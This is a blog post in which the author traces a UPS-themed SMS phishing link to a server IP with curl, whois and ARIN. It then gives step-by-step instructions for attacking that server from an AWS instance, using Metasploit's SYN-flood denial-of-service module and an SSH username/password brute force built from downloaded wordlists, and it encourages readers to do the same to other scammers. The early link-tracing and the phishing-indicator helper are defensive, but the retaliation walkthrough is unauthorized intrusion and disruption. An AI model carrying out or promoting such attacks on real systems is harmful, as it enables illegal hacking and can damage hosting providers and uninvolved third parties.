
I’ll start by saying that this is probably not very effective at actually stopping a scammer, but it will arm you with more information that you could choose to act on by reporting them to various groups. It also might make you feel a little better, like yelling at someone who has stolen something from you and chasing them for a bit down the street.

This could also be a hacking primer. I’ll assume you’re here for good though and only trying to retaliate against someone that has done you harm.

It started with a whisper … just kidding. It started with a SMS message:

Initial text

From: re7@ups-dlvr.com
UPS#7123293: We were unable to complete your delivery to reschedule, please navigate below: https://bit.ly/3Tm3lbK

As it happens, I was expecting a UPS delivery this week. It was a long day at work and I was tired. I even ran outside to see if I could see the truck or any evidence that they had tried to deliver something. I didn’t see anything. I then clicked on the link and was taken to a site that had a URL similar to http://ups-wwwaps.com (I didn’t save it). It had a page that looked like a UPS site, and a login field. I auto-populated with something that I thought was my UPS login, and nothing came up. I figured I’d deal with it later and then took a nap.

I woke up from my nap realizing how dumb I had been. I had 1) confirmed a phone number with an email address and 2) may have given them valid login credentials. As it turned out, I didn’t have valid credentials that were using those fields, so I got off lucky there. But now, I was curious about them. Where were they? I started to do some research, thought about reporting them to The Gov’ment, but decided against it. It looked like a lot of red tape and they wanted ALL of my personal info. Let’s see what I can find out.

I decided to do some research, and try to figure out how much I could obtain about my scammer. Here is my process, maybe you can do something similar (or even better), once I show you the tools available to you.

Start with the bit link. Bitlinks are redirects: Bitly keeps a mapping from the short link they give you to the link someone wants it to redirect to. Looking up the bit link with curl -I doesn’t expose you to the scammer, because curl only talks to Bitly and does not follow the redirect. Going to it in a browser will.

In your closest handy terminal (macOS / Unix variant) run the following command with the URL that was sent to you.

curl -I https://bit.ly/3Tm3lbK

This comes back with the following:

HTTP/2 301
server: nginx
date: Thu, 03 Nov 2022 01:23:25 GMT
content-type: text/html; charset=utf-8
content-length: 110
cache-control: private, max-age=90
location: http://159.223.184.236/
via: 1.1 google
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000

This shows that there is a 301 (which is a redirect). All 301 responses are going to have a location, which tells you where to go next. In this case, we have a location that is curiously at an IP address. This is suspicious right away, as any stable website would want to use a domain name instead of an IP. They’re going incognito.
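As an added example (my own, not from the post), here is a small Python triage helper that parses saved curl -I output and flags the warning signs discussed here: a redirect to a bare IP address, a lookalike host that merely contains the brand name (like the ups-wwwaps.com page above), and plain HTTP. It generalizes slightly beyond this one link by checking any 3xx hop. The sample response and the 203.0.113.5 address are constructed (RFC 5737 documentation range), and the expected brand domain is an assumed parameter.

```python
import ipaddress
from urllib.parse import urlsplit

# Constructed sample of what `curl -I` prints for a short link.
# 203.0.113.5 is a documentation address, not a real host.
SAMPLE_HOP = """HTTP/2 301
server: nginx
date: Thu, 03 Nov 2022 01:23:25 GMT
content-type: text/html; charset=utf-8
location: http://203.0.113.5/
"""

def parse_curl_head(raw):
    """Return (status_code, headers) from raw `curl -I` output."""
    lines = raw.strip().splitlines()
    status = int(lines[0].split()[1])          # "HTTP/2 301" -> 301
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return status, headers

def host_is_bare_ip(url):
    """True when the URL's host is a literal IPv4/IPv6 address."""
    try:
        ipaddress.ip_address(urlsplit(url).hostname or "")
        return True
    except ValueError:
        return False

def triage_hop(raw, expected_brand="ups.com"):
    """Summarize one redirect hop and list phishing indicators found."""
    status, headers = parse_curl_head(raw)
    location = headers.get("location")
    flags = []
    if 300 <= status < 400 and location:
        host = (urlsplit(location).hostname or "").lower()
        brand = expected_brand.split(".")[0]
        legit = host == expected_brand or host.endswith("." + expected_brand)
        if host_is_bare_ip(location):
            flags.append("redirects to bare IP address")
        elif brand in host and not legit:
            flags.append("lookalike domain containing the brand name")
        if location.lower().startswith("http://"):
            flags.append("plain HTTP, no TLS")
    return {"status": status, "location": location, "flags": flags}
```

Paste the headers curl printed into the string and read the flags list; an empty list for a 3xx hop means nothing in the target URL itself looked off.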

Once you have an IP, you can go do two searches. Whois and ARIN.

In your terminal type in: whois 159.223.184.236 (the registration record for the address) or nslookup 159.223.184.236 (a reverse DNS lookup for any hostname pointing at it)

This will tell you a little info about which organization the IP address is allocated to. If there is a domain attached to it, it will tell you who owns that domain. It may not be the individual; it may also show as part of a range of IPs for an ISP or hosting provider. It will NOT be the site that you thought you were going to. Mine said nothing about “UPS” owning it.

If you don’t get enough useful info there, you can also go to ARIN and enter the IP in the main search bar on the home page. This will tell you who owns the block of IP addresses, very likely an ISP or hosting provider.

If you’d like to stop here and report them to their ISP, that’s a perfectly good place to stop. Or not!

Now, I’d like to start probing the IP address, but as soon as I contact that server from my machine, I’m giving away my IP address. Just more info to them. So, let’s go do this on a safe machine and open up an AWS EC2 instance instead. This is a little cumbersome if you haven’t done it before. BUT, you only have to do this first part once.

(You can skip if you already have a .pem and a security group set up) If you haven’t already, you’ll first need to set up an AWS account. You’ll have to give them payment information but it won’t cost you anything to have an account. For the small amount of time that you’ll be running a server, it won’t cost you a dime either. Just make sure you turn off the server when you’re done.

AWS has a short document on setting up the basics. You’ll need a keypair.pem file which will provide your authentication when you SSH into your EC2 (download it and save it somewhere that you can find again), and you’ll need to set up a security group in AWS, which you will be able to reuse. The main thing to do in Security Groups is add a rule for Type: SSH. You don’t even need to allow HTTP if you’re not hosting a web server.

An EC2 is just a virtual machine with an operating system already installed. You pick the size and the OS and AWS will “spin it up” for you. More detailed instructions from AWS are here on setting up an EC2. Make sure you choose the Free Tier and Ubuntu as your OS.

After you answer all the questions, you’ll have an EC2 instance starting up.

From the menu on the left, select “Instances”. This window will come up. Click on the name of the instance you just set up.

Wait a minute or so and then the Public IP will populate. Click the cute Copy icon next to it to save to your clip board. You’ll use it to SSH.

Private IP

Again, Amazon is always going to have the best documentation on using their services. Their guide to accessing EC2 Linux instances is great. The basics are: open up a terminal window locally and enter the following:

ssh -i /path/key-pair-name.pem instance-user-name@instance-public-dns-name

Replace the placeholders as follows:

  • /path/key-pair-name.pem with the path to the .pem file you saved,
  • instance-user-name with ubuntu,
  • and instance-public-dns-name with the public IP address you just copied to your clipboard.

You’ll get a message in your terminal that “The authenticity of host” can’t be established and asking whether you want to continue. Say “Yes”. You will only get this message the first time you connect to a new address.

You should then see a welcome message.

“Welcome to Ubuntu 22.04.1 LTS (GNU/Linux 5.15.0-1019-aws x86_64)”

Let’s curl that IP address now:

ubuntu@ip-172-31-22-15:~$ curl -I http://159.223.184.236

HTTP/1.1 302 Found
Date: Thu, 03 Nov 2022 02:16:12 GMT
Server: Apache/2.4.29 (Ubuntu)
Set-Cookie: PHPSESSID=6ivaooa02eq0p9cv8s1u5ep0c7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
location: https://www.webfx.com/web-development/glossary/http-status-codes/
Content-Type: text/html; charset=UTF-8

More useful info! My results show the site after the scam page was already taken down. Instead of a 302, it would’ve shown a 200 (meaning your request was successful). But it also shows that they’re running Apache, and Ubuntu. Like me! It’s also showing that there is a PHPSESSID cookie, which tells me that they’re running PHP.

Now we’re getting somewhere. This info could be useful in choosing other types of attacks to run against it.

From here, I really leveraged this tutorial on how to gain SSH access to a server by brute-forcing credentials. I’ll link to it again at the end. Before you go there, I’d advise some setup:

Type the following into your terminal

  • sudo apt-get update
    • Refreshes the list of available packages
  • sudo apt-get install nmap
    • and say “Yes” to all the prompts
  • sudo apt-get install postgresql
    • I can’t remember the prompts. Sorry
  • sudo service postgresql start
    • Start postgresql

The official directions are on the metasploit site. I had trouble executing the command so I broke it up and added sudo.

sudo curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall
chmod 755 msfinstall
sudo ./msfinstall
  • sudo msfconsole
    • Say “Yes” for “Would you like to use and setup a new database
    • You need to run as root to get access to the network ports

This isn’t a really large scale attack, but it’s something. From within msfconsole:

  • use auxiliary/dos/tcp/synflood
  • set RHOSTS
  • set RPORT 80
  • exploit

This guy has a pretty amazing repo of passwords and usernames. Pick some and download them with wget to your ubuntu instance. Go to the file, so you can view the contents and copy the permalink, like so: Copy Permalink

Go to your ubuntu terminal and enter wget and paste the url you copied, like so (no returns until the end): wget https://github.com/danielmiessler/SecLists/blob/74a331a039532b8a6fd92af376cb0215a5dc0378/Passwords/Common-Credentials/top-20-common-SSH-passwords.txt

This will download a file to the directory that you’re in. Type ls and you’ll see top-20-common-SSH-passwords.txt

Do the same with usernames, like so:

wget https://github.com/danielmiessler/SecLists/blob/74a331a039532b8a6fd92af376cb0215a5dc0378/Usernames/top-usernames-shortlist.txt

Type ls and you’ll now see the password and the top-usernames-shortlist.txt

From there, I followed the directions on the tutorial I linked above to start the postgresql service and run msfconsole.

  1. Following the tutorial I set rhosts to be the IP I got above.
  2. I set the user_file to be the name of the user file I downloaded.
  3. I set the pass_file to be the name of the password file I downloaded.
  4. And I used auxiliary/scanner/ssh/ssh_login as was also mentioned in the tutorial.
  5. Then I entered run

With set verbose true, I was able to see every attempt at every login and password.

I stopped here, but if I spent more time learning msfconsole, I could also try more PHP, apache, or ubuntu targeted exploits. msfconsole has many more options, but you need to dedicate a little time in each to learn what they are.

I did not successfully break into the server. I did successfully run through the multiple iterations of usernames & passwords. I also had to restart it a couple of times due to being disconnected. Eventually the scammer server started redirecting to another page. I’m not sure if that had anything to do with me (doubt it), if the scammer closed their service down for a time, or if they were shut down. I’ll keep checking the IP over the next week and see if anything changes.

More importantly though, I’m set up for using msfconsole. There are multiple types of exploits, and “payloads” that can be specified (that github link also has payload examples, or you can specify one that comes with msfconsole). This is a powerful tool! You could run it against your own servers to see if they’re vulnerable, pick a type of exploit and learn more about how it works and why, try to hack your friends as a service, or just try to run a little reverse sting operation on the next scammer that runs across your yard shouting “GET OFF MY LAWN!”

Hope you found this helpful. Feel free to comment.